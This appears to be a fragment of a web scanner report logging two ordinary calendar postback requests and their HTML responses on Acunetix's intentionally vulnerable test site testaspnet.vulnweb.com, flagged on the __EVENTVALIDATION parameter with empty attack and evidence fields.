Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1063 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,063 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8370&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMBr%2FS7T2ghkZGQJ12EJOQw9wYSB4QZaGveA0%2BGAFw%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLy9LOxCwL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBKx43MBsjE7y1FiKQ6ozw90VPWFw
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:51:52 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAMBr/S7T2ghkZGQJ12EJOQw9wYSB4QZaGveA0+GAFw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLy9LOxCwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBKx43MBsjE7y1FiKQ6ozw90VPWFw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:White" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1133 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,133 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8230&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgDAlssrZdoIZGRkOd%2Fs4%2FwbXiMoZ789DdJfV%2FL73bk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLYnoC5DgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2F3IbDEL5S%2FS9maUEfvZhxmg5lLtg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:29:41 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgDAlssrZdoIZGRkOd/s4/wbXiMoZ789DdJfV/L73bk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLYnoC5DgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/3IbDEL5S/S9maUEfvZhxmg5lLtg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:White" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
